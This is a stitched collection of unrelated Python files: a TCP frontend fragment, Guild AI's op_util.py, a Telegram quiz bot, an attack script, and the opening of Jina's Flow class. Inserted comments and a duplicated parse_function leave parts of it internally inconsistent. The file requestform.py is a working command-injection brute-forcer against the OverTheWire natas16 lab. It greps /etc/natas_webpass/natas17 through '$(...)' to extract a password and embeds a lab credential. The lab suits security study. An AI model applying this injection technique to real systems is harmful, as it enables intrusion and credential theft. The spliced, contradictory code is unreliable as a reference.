# server log now
print("Frontend: ", res)
response = res.encode()
print("Frontend encoded: ", response)
self.request.sendall(response)
def main(host, port):
# for i in range(1, 4):
# t = threading.Thread(target=order_server.main, args=[i])
# t.daemon = True
# t.start()
server = socketserver.TCPServer((host, port), MyServer)
server.serve_forever()
if __name__ == "__main__":
print("Arguments frontend: ", sys.argv)
hostname = sys.argv[1]
portnum = int(sys.argv[2])
main(hostname, portnum)
|
op_util.py
|
# Copyright 2017-2019 TensorHub, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import fnmatch
import csv
import hashlib
import logging
import re
import os
import shlex
import shutil
import struct
import sys
import threading
import time
import six
from six.moves import shlex_quote
import yaml
# Move any import that's expensive or seldom used into function
from guild import util
log = logging.getLogger("guild")
# Legacy support for functionality moved to _api
from guild import _api
NoCurrentRun = _api.NoCurrentRun
current_run = _api.current_run
function_pattern = re.compile(r"([a-zA-Z0-9_\-\.]*)\[(.*)\]\s*$")
function_arg_delimiter = ":"
RESTART_NEEDED_STATUS = ("pending",)
class ArgValueError(ValueError):
def __init__(self, arg):
super(ArgValueError, self).__init__(arg)
self.arg = arg
class MissingRequiredFlags(ValueError):
def __init__(self, missing):
super(MissingRequiredFlags, self).__init__(missing)
self.missing = missing
class InvalidFlagChoice(ValueError):
def __init__(self, val, flag):
super(InvalidFlagChoice, self).__init__(val, flag)
self.val = val
self.flag = flag
class InvalidFlagValue(ValueError):
def __init__(self, val, flag, msg):
super(InvalidFlagValue, self).__init__(val, flag, msg)
self.val = val
self.flag = flag
self.msg = msg
class ProcessError(Exception):
pass
class RunOutput(object):
DEFAULT_WAIT_TIMEOUT = 10
def __init__(self, run, proc=None, quiet=False, output_cb=None):
assert run
self._run = run
self._quiet = quiet
self._output_cb = output_cb
self._output_lock = threading.Lock()
self._open = False
self._proc = None
self._output = None
self._index = None
self._out_tee = None
self._err_tee = None
if proc:
self.open(proc)
@property
def closed(self):
return not self._open
def open(self, proc):
self._assert_closed()
if proc.stdout is None:
raise RuntimeError("proc stdout must be a PIPE")
if proc.stderr is None:
raise RuntimeError("proc stderr must be a PIPE")
self._proc = proc
self._output = self._open_output()
self._index = self._open_index()
self._out_tee = threading.Thread(target=self._out_tee_run)
self._err_tee = threading.Thread(target=self._err_tee_run)
self._out_tee.start()
self._err_tee.start()
self._open = True
def _assert_closed(self):
if self._open:
raise RuntimeError("already open")
assert self._proc is None
assert self._output is None
assert self._index is None
assert self._out_tee is None
assert self._err_tee is None
def _open_output(self):
path = self._run.guild_path("output")
return open(path, "wb")
def _open_index(self):
path = self._run.guild_path("output.index")
return open(path, "wb")
def _out_tee_run(self):
assert self._proc
self._gen_tee_run(self._proc.stdout, sys.stdout, 0)
def _err_tee_run(self):
assert self._proc
self._gen_tee_run(self._proc.stderr, sys.stderr, 1)
def _gen_tee_run(self, input_stream, output_stream, stream_type):
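        # Copies bytes from the child process stream to the visible console
        # stream (unless quiet), to the run's output file, and to an index
        # file. For every completed line a struct-packed "!QB" record is
        # appended to the index: an 8-byte millisecond timestamp plus a
        # 1-byte stream type (0 for stdout, 1 for stderr), presumably so
        # readers can interleave stdout and stderr chronologically later.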
assert self._output
assert self._index
os_read = os.read
os_write = os.write
input_fileno = input_stream.fileno()
if not self._quiet:
stream_fileno = output_stream.fileno()
else:
stream_fileno = None
output_fileno = self._output.fileno()
index_fileno = self._index.fileno()
time_ = time.time
lock = self._output_lock
line = []
while True:
b = os_read(input_fileno, 1)
if not b:
break
with lock:
if stream_fileno is not None:
os_write(stream_fileno, b)
if b < b"\x09": # non-printable
continue
line.append(b)
if b == b"\n":
line_bytes = b"".join(line)
os_write(output_fileno, line_bytes)
line = []
entry = struct.pack(
"!QB", int(time_() * 1000), stream_type)
os_write(index_fileno, entry)
if self._output_cb:
try:
self._output_cb.write(line_bytes)
except Exception:
log.exception(
"error in output callback (will be removed)")
self._output_cb = None
def wait(self, timeout=DEFAULT_WAIT_TIMEOUT):
self._assert_open()
self._out_tee.join(timeout)
self._err_tee.join(timeout)
def _assert_open(self):
if not self._open:
raise RuntimeError("not open")
assert self._proc
assert self._output
assert self._index
assert self._out_tee
assert self._err_tee
def close(self):
lock = self._acquire_output_lock()
try:
self._close()
finally:
lock.release()
def _acquire_output_lock(self, timeout=60):
"""Polling verison of acquire to support timeouts on Python 2."""
timeout_at = time.time() + timeout
while time.time() < timeout_at:
if self._output_lock.acquire(False):
return self._output_lock
time.sleep(1)
raise RuntimeError("timeout")
def _close(self):
self._assert_open()
self._output.close()
self._index.close()
if self._output_cb:
try:
self._output_cb.close()
except Exception:
log.exception("closing output callback")
assert not self._out_tee.is_alive()
assert not self._err_tee.is_alive()
self._proc = None
self._output = None
self._index = None
self._out_tee = None
self._err_tee = None
self._open = False
def wait_and_close(self, timeout=DEFAULT_WAIT_TIMEOUT):
self.wait(timeout)
self.close()
def resolve_file(filename):
return util.find_apply([
_abs_file,
_cmd_file,
_model_file,
_cwd_file
], filename)
def _abs_file(filename):
if os.path.isabs(filename):
return filename
return None
def _cmd_file(filename):
assert "CMD_DIR" in os.environ
filename = os.path.join(os.environ["CMD_DIR"], filename)
if os.path.exists(filename):
return filename
return None
def parse_flags(args):
return dict([parse_flag_arg(os.path.expanduser(arg)) for arg in args])
def parse_flag_arg(arg):
parts = arg.split("=", 1)
if len(parts) == 1:
raise ArgValueError(arg)
else:
return parts[0], parse_arg_val(parts[1])
def parse_arg_val(s):
if s == "":
return s
parsers = [
(int, ValueError),
(float, ValueError),
(_yaml_parse, (ValueError, yaml.YAMLError)),
]
for p, e_type in parsers:
try:
return p(s)
except e_type:
pass
return s
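# NOTE: parse_function() is used by _yaml_parse() below but is not defined in
# this file as excerpted. The following is a minimal sketch reconstructed from
# function_pattern and function_arg_delimiter above - an assumption, not the
# original implementation: it parses strings such as "uniform[-0.1:0.1]" into
# a (name, args) tuple and raises ValueError for anything else.
def parse_function(s):
    if not isinstance(s, six.string_types):
        raise ValueError("requires string")
    m = function_pattern.match(s)
    if not m:
        raise ValueError("not a function")
    name = m.group(1) or None
    args_raw = m.group(2).strip()
    if args_raw:
        args_s = args_raw.split(function_arg_delimiter)
    else:
        args_s = []
    args = tuple(parse_arg_val(arg.strip()) for arg in args_s)
    return name, args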
def _yaml_parse(s):
"""Uses yaml module to parse s to a Python value.
First tries to parse as an unnamed flag function with at least two
args and, if successful, returns s unmodified. This prevents yaml
from attempting to parse strings like '1:1' which it considers to
be timestamps.
"""
try:
name, args = parse_function(s)
except ValueError:
pass
else:
if name is None and len(args) >= 2:
return s
return yaml.safe_load(s)
def format_flag_val(val):
if val is True:
return "yes"
elif val is False:
return "no"
elif val is None:
return "null"
elif isinstance(val, list):
return _format_flag_list(val)
elif isinstance(val, (six.string_types, float)):
return _yaml_format(val)
else:
return str(val)
def _format_flag_list(val_list):
joined = ", ".join([format_flag_val(val) for val in val_list])
return "[%s]" % joined
def _yaml_format(val):
formatted = yaml.safe_dump(val).strip()
if formatted.endswith("\n..."):
formatted = formatted[:-4]
return formatted
def format_flag_arg(name, val):
return "%s=%s" % (name, format_flag_val(val))
class TFEvents(object):
def __init__(self, logdir):
self.logdir = logdir
self._writer = None
def add_scalars(self, scalars, global_step=None):
self._ensure_writer()
self._writer.add_summary(self._scalars_summary(scalars), global_step)
@staticmethod
def _scalars_summary(scalars):
import tensorflow as tf
value = [
tf.summary.Summary.Value(tag=tag, simple_value=val)
for tag, val in scalars
]
return tf.summary.Summary(value=value)
def _ensure_writer(self):
import tensorflow as tf
if not self._writer:
self._writer = tf.summary.FileWriter(self.logdir, max_queue=0)
def flush(self):
if self._writer:
self._writer.flush()
def close(self):
if self._writer:
self._writer.close()
self._writer = None
def __enter__(self):
return self
def __exit__(self, *_args):
self.close()
def tfevents(subdir=None, run=None):
if not run:
run = current_run()
if subdir:
logdir = os.path.join(run.path, subdir)
else:
logdir = run.path
return TFEvents(logdir)
def exit(msg, exit_status=1):
"""Exit the Python runtime with a message.
"""
sys.stderr.write(os.path.basename(sys.argv[0]))
sys.stderr.write(": ")
sys.stderr.write(msg)
sys.stderr.write("\n")
sys.exit(exit_status)
def parse_op_args(args):
if len(args) < 2:
exit("usage: %s COMMAND [ARG...]" % args[0])
return args[1], args[2:]
def args_to_flags(args):
flags, _args = args_to_flags2(args)
return flags
def args_to_flags2(args):
flags = {}
extra = []
name = None
for arg in args:
if arg[:2] == "--":
name = arg[2:]
flags[name] = True
elif arg[:1] == "-":
val = parse_arg_val(arg)
if isinstance(val, (int, float)):
flags[name] = val
elif len(arg) == 2:
name = arg[1]
flags[name] = True
elif len(arg) > 2:
name = None
flags[arg[1]] = arg[2:]
elif name is not None:
flags[name] = parse_arg_val(arg)
name = None
else:
extra.append(arg)
return flags, extra
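# Informal example of the flag parsing above (hypothetical command line):
#   args_to_flags2(["--lr", "0.1", "-b", "32", "train.py"])
#     -> ({"lr": 0.1, "b": 32}, ["train.py"])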
def global_dest(global_name, flags):
dest = cur = {}
for name in global_name.split("."):
cur = cur.setdefault(name, {})
cur.update(flags)
return dest
def find_file(path):
return util.find_apply([_cwd_file, _model_file], path)
def _cwd_file(path):
if os.path.exists(path):
return path
return None
def _model_file(path):
model_path = os.getenv("MODEL_PATH")
if model_path:
for root in model_path.split(os.path.pathsep):
full_path = os.path.join(root, path)
if os.path.exists(full_path):
return full_path
return None
def coerce_flag_value(val, flagdef):
"""Coerces a flag value based on flagdef settings."""
if val is None or not flagdef or not flagdef.type:
return val
if isinstance(val, list):
return [coerce_flag_value(x, flagdef) for x in val]
elif flagdef.type == "string":
return _try_coerce_flag_val(val, str, flagdef)
elif flagdef.type == "int":
if isinstance(val, float):
raise ValueError("invalid value for type 'int'")
return _try_coerce_flag_val(val, int, flagdef)
elif flagdef.type == "float":
return _try_coerce_flag_val(val, float, flagdef)
elif flagdef.type == "number":
if isinstance(val, (float, int)):
return val
return _try_coerce_flag_val(val, (int, float), flagdef)
elif flagdef.type in ("path", "existing-path"):
return _resolve_rel_path(val)
else:
log.warning(
"unknown flag type '%s' for %s - cannot coerce",
flagdef.type, flagdef.name)
return val
def _try_coerce_flag_val(val, funs, flagdef):
if not isinstance(funs, tuple):
funs = (funs,)
for f in funs:
try:
return f(val)
except ValueError as e:
log.debug("value error applying %s to %r: %s", f, val, e)
raise ValueError("invalid value for type '%s'" % flagdef.type)
def _resolve_rel_path(val):
if val and not os.path.isabs(val):
return os.path.abspath(val)
return val
def validate_flag_vals(vals, opdef):
_check_missing_flags(vals, opdef)
_check_flag_vals(vals, opdef)
def _check_missing_flags(vals, opdef):
missing = _missing_flags(vals, opdef)
if missing:
raise MissingRequiredFlags(missing)
def _missing_flags(vals, opdef):
return [
flag for flag in opdef.flags
if flag.required and _flag_missing(vals.get(flag.name))
]
def _flag_missing(val):
if val is None or val == "":
return True
return False
def _check_flag_vals(vals, opdef):
for flag in opdef.flags:
val = vals.get(flag.name)
_check_flag_choice(val, flag)
_check_flag_type(val, flag)
_check_flag_range(val, flag)
def _check_flag_choice(val, flag):
if (val and flag.choices and not flag.allow_other and
val not in [choice.value for choice in flag.choices]):
raise InvalidFlagChoice(val, flag)
def _check_flag_type(val, flag):
if flag.type == "existing-path":
if val and not os.path.exists(val):
raise InvalidFlagValue(val, flag, "%s does not exist" % val)
def _check_flag_range(val, flag):
if val is None:
return
if flag.min is not None and val < flag.min:
raise InvalidFlagValue(
val, flag, "out of range (less than min %s)" % flag.min)
if flag.max is not None and val > flag.max:
raise InvalidFlagValue(
val, flag, "out of range (greater than max %s)" % flag.max)
def copy_source(run, opdef):
_copy_source(
opdef.guildfile.dir,
opdef.modeldef.source,
run.guild_path("source"))
def _copy_source(src_base, source_config, dest_base):
to_copy = _source_to_copy(src_base, source_config)
if not to_copy:
log.debug("no source to copy")
return
for src, src_rel_path in to_copy:
dest = os.path.join(dest_base, src_rel_path)
log.debug("copying source %s to %s", src, dest)
util.ensure_dir(os.path.dirname(dest))
_try_copy_file(src, dest)
def _source_to_copy(src_dir, source_config):
to_copy = []
seen_dirs = set()
for root, dirs, files in os.walk(src_dir, followlinks=True):
seen_dirs.add(os.path.realpath(root))
_del_excluded_dirs(dirs, root, seen_dirs)
for name in files:
path = os.path.join(root, name)
rel_path = os.path.relpath(path, src_dir)
if _to_copy(path, rel_path, source_config):
to_copy.append((path, rel_path))
return to_copy
def _try_copy_file(src, dest):
try:
shutil.copyfile(src, dest)
except (IOError, OSError) as e:
# This is not an error we want to stop an operation for. Log
# and continue.
if log.getEffectiveLevel() <= logging.DEBUG:
log.exception("copy %s to %s", src, dest)
else:
log.warning("could not copy source file %s: %s", src, e)
def _del_excluded_dirs(dirs, root, seen_dirs):
_del_env_dirs(dirs, root)
_del_dot_dir(dirs)
_del_seen_dirs(dirs, root, seen_dirs)
def _del_env_dirs(dirs, root):
for name in dirs:
if _is_env_dir(os.path.join(root, name)):
dirs.remove(name)
def _del_dot_dir(dirs):
for d in list(dirs):
if d[:1] == ".":
dirs.remove(d)
def _del_seen_dirs(dirs, root, seen):
for dir_name in dirs:
real_path = os.path.realpath(os.path.join(root, dir_name))
if real_path in seen:
dirs.remove(dir_name)
def _is_env_dir(path):
return os.path.exists(os.path.join(path, "bin", "activate"))
def _to_copy(path, rel_path, source_config):
last_match = None
for spec in source_config.specs:
if _source_match(rel_path, spec):
last_match = spec
if last_match:
return _to_copy_for_spec(last_match)
return _is_text_file(path)
def _source_match(rel_path, spec):
return any((fnmatch.fnmatch(rel_path, p) for p in spec.patterns))
def _to_copy_for_spec(spec):
return spec.type == "include"
def _is_text_file(path):
from guild import binaryornot
return not binaryornot.is_binary(path)
def split_main(main):
if isinstance(main, list):
return main
# If main is None, this call will block (see
# https://bugs.python.org/issue27775)
return shlex.split(main or "")
# Alias
split_cmd = split_main
def wait_for_proc(p, stop_after_min, poll_interval=5, kill_delay=30):
stop_at = time.time() + stop_after_min * 60
while time.time() < stop_at:
time.sleep(poll_interval)
returncode = p.poll()
if returncode is not None:
return returncode
log.info(
"Stopping process early (pid %i) - %i minute(s) elapsed",
p.pid, stop_after_min)
return _terminate(p, poll_interval, kill_delay)
def _terminate(p, poll_interval, kill_delay):
kill_at = time.time() + kill_delay
p.terminate()
while p.poll() is None and time.time() < kill_at:
time.sleep(poll_interval)
if p.poll() is None:
log.warning("Process did not terminate (pid %i), killing", p.pid)
p.kill()
time.sleep(poll_interval)
returncode = p.poll()
if returncode not in (0, -15):
raise ProcessError(
"Process did not terminate gracefully (pid %i)"
% p.pid)
return returncode
def init_logging():
import guild.log
level = int(os.getenv("LOG_LEVEL", logging.WARN))
format = os.getenv("LOG_FORMAT", "%(levelname)s: [%(name)s] %(message)s")
guild.log.init_logging(level, {"_": format})
globals()["log"] = logging.getLogger("guild")
def print_trials(trials):
from guild import cli
data, cols = _trials_table_data(trials)
cli.table(data, cols)
def _trials_table_data(trials):
names = set()
data = []
for i, flags in enumerate(trials):
row = {"_trial": i + 1}
data.append(row)
if flags:
row.update(
{name: format_flag_val(flags[name])
for name in flags})
names.update(flags)
heading = {name: name for name in names}
heading["_trial"] = "#"
return [heading] + data, ["_trial"] + sorted(names)
def save_trials(trials, path):
data, cols = _trials_table_data(trials)
cols.remove("_trial") # Don't include trial number in CSV
with open(path, "w") as f:
out = csv.writer(f)
for row in data:
out.writerow([row.get(name, "") for name in cols])
def op_flag_encoder(op):
import importlib
spec = op.opdef.flag_encoder
if not spec:
return None
parts = spec.split(":")
if len(parts) != 2:
        log.warning(
            "invalid flag encoder %r - must be MODULE:FUNCTION",
            spec)
return None
mod_name, fun_name = parts
try:
mod = importlib.import_module(mod_name)
except Exception as e:
if log.getEffectiveLevel() <= logging.DEBUG:
log.exception("importing %s", mod_name)
else:
            log.warning(
                "cannot load flag encoder %r: %s",
                spec, e)
return None
fun = getattr(mod, fun_name, None)
if fun is None:
        log.warning(
            "cannot load flag encoder %r: no such attribute in %s",
            spec, mod_name)
return None
return fun
def ensure_exit_status(run, exit_status):
from guild import op as oplib
run_exit_status = run.get("exit_status")
if run_exit_status is None:
run.write_attr("exit_status", exit_status)
oplib.delete_pending(run)
def format_op_desc(run, nowarn=False, seen_protos=None):
seen_protos = seen_protos or set()
opref = run.opref
base_desc = _base_op_desc(opref, nowarn)
return _apply_batch_desc(base_desc, run, seen_protos)
def _base_op_desc(opref, nowarn):
if opref.pkg_type == "guildfile":
return _format_guildfile_op(opref)
elif opref.pkg_type == "package":
return _format_package_op(opref)
elif opref.pkg_type == "script":
return _format_script_op(opref)
elif opref.pkg_type == "builtin":
return _format_builtin_op(opref)
elif opref.pkg_type == "pending":
return _format_pending_op(opref)
elif opref.pkg_type == "test":
return _format_test_op(opref)
else:
if not nowarn:
log.warning(
"cannot format op desc, unexpected pkg type: %s (%s)",
opref.pkg_type, opref.pkg_name)
return "?"
def _format_guildfile_op(opref):
parts = []
gf_dir = _guildfile_dir(opref)
if gf_dir:
parts.extend([gf_dir, os.path.sep])
if opref.model_name:
parts.extend([opref.model_name, ":"])
parts.append(opref.op_name)
return "".join(parts)
def _guildfile_dir(opref):
from guild import config
gf_dir = os.path.dirname(opref.pkg_name)
relpath = os.path.relpath(gf_dir, config.cwd())
if relpath == ".":
return ""
return re.sub(r"\.\./(\.\./)+", ".../", _ensure_dot_path(relpath))
def _ensure_dot_path(path):
if path[0:1] == ".":
return path
return os.path.join(".", path)
def _format_package_op(opref):
return "%s/%s:%s" % (opref.pkg_name, opref.model_name, opref.op_name)
def _format_script_op(opref):
return _format_guildfile_op(opref)
def _format_builtin_op(opref):
return opref.op_name
def _format_pending_op(opref):
return "<pending %s>" % opref.op_name
def _format_test_op(opref):
return "%s:%s" % (opref.model_name, opref.op_name)
def _apply_batch_desc(base_desc, run, seen_protos):
import guild.run
try:
proto_dir = run.guild_path("proto")
except TypeError:
# Occurs for run proxies that don't support guild_path - punt
# with generic descriptor. (TODO: implement explicit behavior
# in run interface + proxy)
proto_dir = ""
if not os.path.exists(proto_dir):
return base_desc
if proto_dir in seen_protos:
# We have a cycle - drop this proto_dir
return base_desc
seen_protos.add(proto_dir)
proto_run = guild.run.Run("", proto_dir)
proto_op_desc = format_op_desc(proto_run, seen_protos=seen_protos)
parts = [proto_op_desc]
if not base_desc.startswith("+"):
parts.append("+")
parts.append(base_desc)
return "".join(parts)
def run_params_for_restart(run, user_specified_params=None):
"""Returns params for use in run command for a restart of run.
The set of applicable params in the run "run_params" attribute are
considered. If user_specified_params contains a non-default value
(i.e. the user has indicated she wants to use a specific value)
that param will not be included in the result. If
user_specified_params is None (default) then all applicable params
for a restart that are defined in run are returned.
"""
# Note about applicable run params:
#
# A limited number of params could possibly apply to args - those
# are listed here. This list has to be maintained as new args are
# added to the run command. Params must be included where the user
# would reasonably assume applicability and never in cases where
# the use of the parameter would be clearly surprising to the user
# (e.g. reusing the 'yes' param, which would alter the expected
# behavior of the command on a restart/rerun).
#
# Params that are saved as run attrs or otherwise available under
# the run guild path (e.g. opspec, label, flags) should NOT be
# returned in this value in the interest of eliminating redundancy
# and potential mismatch bugs. Anyone needing those values MUST
# read them via run attrs or the applicable run interface
# (e.g. opref in the case of opspec).
#
applicable_run_params = [
"disable_plugins",
"force_flags",
"gpus",
"max_trials",
"maximize",
"minimize",
"no_gpus",
"opt_flags",
"optimizer",
"random_seed",
]
from guild.commands.run import run as run_cmd
run_params = run.get("run_params", {})
if not isinstance(run_params, dict):
return
baseline_params = run_cmd.make_context("", []).params
result = {}
for name in run_params:
val = _coerce_run_param(name, run_params[name])
if name not in applicable_run_params:
continue
if user_specified_params is None:
result[name] = val
continue
try:
user_specified_val = user_specified_params[name]
except KeyError:
result[name] = val
continue
if user_specified_val != baseline_params[name]:
continue
result[name] = val
return result
def _coerce_run_param(name, val):
"""Ensures that named param is valid for the run command."""
if name == "flags":
return tuple(val)
return val
def flags_hash(flags):
flag_parts = [
"%s:%s" % (name, format_flag_val(val))
for name, val in sorted(flags.items())
]
to_hash = "\n".join(flag_parts).encode()
return hashlib.md5(to_hash).hexdigest()
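# Editor's sketch: because flag names are sorted before hashing, the digest is
# stable with respect to dict ordering, e.g.
#
#     flags_hash({"lr": 0.1, "epochs": 10}) == flags_hash({"epochs": 10, "lr": 0.1})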
def restart_needed(run, flags):
return run.status in RESTART_NEEDED_STATUS or run.get("flags") != flags
def parse_function(s):
if not isinstance(s, six.string_types):
raise ValueError("requires string")
m = function_pattern.match(s)
if not m:
raise ValueError("not a function")
name = m.group(1) or None
args_raw = m.group(2).strip()
if args_raw:
args_s = args_raw.split(function_arg_delimiter)
else:
args_s = []
args = [parse_arg_val(arg.strip()) for arg in args_s]
return name, tuple(args)
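# Editor's sketch (assumes Guild's usual "NAME[ARG:ARG:...]" function syntax;
# function_pattern and function_arg_delimiter are defined earlier in this
# module): a value such as "uniform[-2.0:2.0]" would parse to
# ("uniform", (-2.0, 2.0)).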
def flag_assigns(flags):
def fmt(val):
if isinstance(val, float):
val = round(val, 4)
return shlex_quote(format_flag_val(val))
return [
"%s=%s" % (name, fmt(flags[name]))
for name in sorted(flags)
]
def opdef_model_paths(opdef):
return _opdef_paths(opdef) + _model_parent_paths(opdef.modeldef)
def _opdef_paths(opdef):
if not opdef.guildfile.dir:
return []
abs_gf_dir = os.path.abspath(opdef.guildfile.dir)
if opdef.python_path is not None:
return [os.path.join(abs_gf_dir, p) for p in opdef.python_path]
return [abs_gf_dir]
def _model_parent_paths(modeldef):
return [os.path.abspath(parent.dir) for parent in modeldef.parents]
def _patch_yaml_safe_loader():
# Credit: https://stackoverflow.com/users/1307905/anthon
# Ref: https://stackoverflow.com/questions/30458977/
# yaml-loads-5e-6-as-string-and-not-a-number
loader = yaml.SafeLoader
loader.add_implicit_resolver(
u'tag:yaml.org,2002:float',
re.compile(u'''^(?:
[-+]?(?:[0-9][0-9_]*)\\.[0-9_]*(?:[eE][-+]?[0-9]+)?
|[-+]?(?:[0-9][0-9_]*)(?:[eE][-+]?[0-9]+)
|\\.[0-9_]+(?:[eE][-+][0-9]+)?
|[-+]?[0-9][0-9_]*(?::[0-5]?[0-9])+\\.[0-9_]*
|[-+]?\\.(?:inf|Inf|INF)
|\\.(?:nan|NaN|NAN))$''', re.X),
list(u'-+0123456789.'))
_patch_yaml_safe_loader()
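# Editor's sketch: with the resolver patch applied, PyYAML's safe loader parses
# scientific-notation literals without a decimal point as floats instead of
# strings, e.g.
#
#     import yaml
#     assert isinstance(yaml.safe_load("5e-6"), float)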
|
bot.py
|
# coding: utf-8
import logging
import schedule
import time
import threading
import settings
from telegram.ext import Updater, CommandHandler, CallbackQueryHandler
from storage import connect_to_database
from models import User
from template_helper import render
from keyboards import KeyboardBuilder
from commands.question import AskQuestion, QueryHandler, choose_question
from commands.clear_data import ClearData
from commands.start import Start
from commands.help import Help
from commands.statistics import Statistics
from commands.auto_question import EnableAutoQuestion, DisableAutoQuestion
# Setup logging
logging.basicConfig(
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
level=logging.INFO
)
logger = logging.getLogger(__name__)
def enviar_questao_automatica(bot):  # "send automatic question": builds the daily auto-question task
def task():
users = User.objects(questao_automatica_ativa=True)
for user in users:
questao = choose_question(user)
text = render('questao.tpl', questao=questao)
keyboard = KeyboardBuilder.answer_keyboard(questao)
bot.sendMessage(text=text,
reply_markup=keyboard,
chat_id=user.chat_id,
parse_mode='html')
return task
def error(bot, update, err):
logger.warning('Update "%s" caused error "%s"', update, err)
def task_runner():
while True:
schedule.run_pending()
time.sleep(1)
def main():
connect_to_database()
updater = Updater(settings.API_KEY)
schedule.every().day.at(settings.AUTO_QUESTION_TIME).do(
enviar_questao_automatica(updater.bot))
dp = updater.dispatcher
dp.add_handler(CommandHandler("start", Start()))
dp.add_handler(CommandHandler("help", Help()))
dp.add_handler(CommandHandler("perguntar", AskQuestion()))
dp.add_handler(CommandHandler("estatisticas", Statistics()))
dp.add_handler(CommandHandler("limpar_dados", ClearData()))
dp.add_handler(CommandHandler("ativar_questao_automatica", EnableAutoQuestion()))
dp.add_handler(CommandHandler("desativar_questao_automatica", DisableAutoQuestion()))
dp.add_handler(CallbackQueryHandler(QueryHandler()))
dp.add_error_handler(error)
updater.start_polling()
thread = threading.Thread(target=task_runner)
thread.daemon = True
thread.start()
updater.idle()
if __name__ == '__main__':
main()
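# Editor's sketch (hypothetical values): the bot expects a local `settings`
# module providing at least the two attributes referenced above, e.g.
#
#     # settings.py
#     API_KEY = "123456:ABC-DEF"        # Telegram bot token (placeholder)
#     AUTO_QUESTION_TIME = "09:00"      # HH:MM passed to schedule.every().day.at()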
|
requestform.py
|
from threading import Thread
import requests
from requests.auth import HTTPBasicAuth
import time
cSetReady = 0
chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
filtered = chars
passwd = ''
url = 'http://natas16.natas.labs.overthewire.org/index.php?needle='
usr = 'natas16'
pwd = 'WaIHEacj63wnNIBROHeqi3p9t0m5nhmh'
param = 'username'
SQLi = 'doomed$(grep {} /etc/natas_webpass/natas17)'
correctResponse = 'doomed'
browser = requests.Session()
browser.auth = (usr, pwd)
def inject(char):
global passwd
payload = SQLi.format('^' + passwd + char)
r = browser.get(url + payload)
if correctResponse not in r.text:
passwd += char
print(passwd)
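# Editor's note: despite the variable name "SQLi", this is OS command injection
# via $() command substitution, not SQL injection. The anchored pattern
# '^<known-prefix><candidate>' makes the inner grep print the target password
# only when the candidate extends the prefix; that output changes the outer
# search needle, so the marker string 'doomed' disappears from the response and
# the candidate character is accepted.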
"""
def getCharSet(char):
global filtered
global cSetReady
payload = SQLi.format('%' + char + '%')
Data = { param : payload }
r = browser.post(url, data=Data)
if correctResponse in r.text :
filtered += char
cSetReady += 1
print('getting charset .... ')
for char in chars:
Thread(target=getCharSet, args={char}).start()
while cSetReady != len(chars):
pass
print("Filter : " + filtered)
"""
for i in range(0, 32):
check = len(passwd)
for char in filtered:
if len(passwd) == check:
Thread(target=inject, args=(char,)).start()
else:
break
# busy-wait until one of the worker threads appends the next character
while len(passwd) == check and not len(passwd) == 32:
pass
|
base.py
|
import argparse
import base64
import copy
import itertools
import json
import os
import re
import sys
import threading
import time
import uuid
import warnings
from collections import OrderedDict
from contextlib import ExitStack
from typing import Optional, Union, Tuple, List, Set, Dict, overload, Type
from .builder import allowed_levels, _hanging_pods
from .. import __default_host__
from ..clients import Client
from ..clients.mixin import AsyncPostMixin, PostMixin
from ..enums import (
FlowBuildLevel,
PodRoleType,
FlowInspectType,
GatewayProtocolType,
InfrastructureType,
PollingType,
)
from ..excepts import (
FlowTopologyError,
FlowMissingPodError,
RoutingTableCyclicError,
RuntimeFailToStart,
)
from ..helper import (
colored,
get_public_ip,
get_internal_ip,
typename,
ArgNamespace,
download_mermaid_url,
CatchAllCleanupContextManager,
)
from ..jaml import JAMLCompatible
from ..logging.logger import JinaLogger
from ..parsers import set_gateway_parser, set_pod_parser, set_client_cli_parser
from ..parsers.flow import set_flow_parser
from ..peapods import CompoundPod, Pod
from ..peapods.pods.k8s import K8sPod
from ..peapods.pods.factory import PodFactory
from ..types.routing.table import RoutingTable
from ..peapods.networking import is_remote_local_connection
__all__ = ['Flow']
class FlowType(type(ExitStack), type(JAMLCompatible)):
"""Type of Flow, metaclass of :class:`BaseFlow`"""
pass
_regex_port = r'(.*?):([0-9]{1,4}|[1-5][0-9]{4}|6[0-4][0-9]{3}|65[0-4][0-9]{2}|655[0-2][0-9]|6553[0-5])$'
if False:
from ..executors import BaseExecutor
from ..clients.base import BaseClient
from .asyncio import AsyncFlow
GATEWAY_NAME = 'gateway'
FALLBACK_PARSERS = [
set_gateway_parser(),
set_pod_parser(),
set_client_cli_parser(),
set_flow_parser(),
]
class Flow(PostMixin, JAMLCompatible, ExitStack, metaclass=FlowType):
"""Flow is how Jina streamlines and distributes Executors. """
class _FlowK8sInfraResourcesManager:
def __init__(self, k8s_namespace: str, k8s_custom_resource_dir: Optional[str]):
self.k8s_namespace = k8s_namespace
self.k8s_custom_resource_dir = k8s_custom_resource_dir
self.namespace_created = False
def __enter__(self):
from ..peapods.pods.k8slib import kubernetes_tools, kubernetes_client
client = kubernetes_client.K8sClients().core_v1
list_namespaces = [
item.metadata.name for item in client.list_namespace().items
]
if self.k8s_namespace not in list_namespaces:
with JinaLogger(f'create_{self.k8s_namespace}') as logger:
logger.info(f'🏝️\tCreate Namespace "{self.k8s_namespace}"')
kubernetes_tools.create(
'namespace',
{'name': self.k8s_namespace},
logger=logger,
custom_resource_dir=self.k8s_custom_resource_dir,
)
self.namespace_created = True
def __exit__(self, exc_type, exc_val, exc_tb):
from ..peapods.pods.k8slib import kubernetes_client
if self.namespace_created:
client = kubernetes_client.K8sClients().core_v1
client.delete_namespace(name=self.k8s_namespace)
# overload_inject_start_client_flow
@overload
def __init__(
self,
*,
asyncio: Optional[bool] = False,
host: Optional[str] = '0.0.0.0',
https: Optional[bool] = False,
port: Optional[int] = None,
protocol: Optional[str] = 'GRPC',
proxy: Optional[bool] = False,
**kwargs,
):
"""Create a Flow. Flow is how Jina streamlines and scales Executors. This overloaded method provides arguments from `jina client` CLI.
:param asyncio: If set, then the input and output of this Client work in an asynchronous manner.
:param host: The host address of the runtime, by default it is 0.0.0.0.
:param https: If set, connect to gateway using https
:param port: The port of the Gateway, which the client should connect to.
:param protocol: Communication protocol between server and client.
:param proxy: If set, respect the http_proxy and https_proxy environment variables. Otherwise, these proxy variables are unset before start; gRPC seems to prefer no proxy
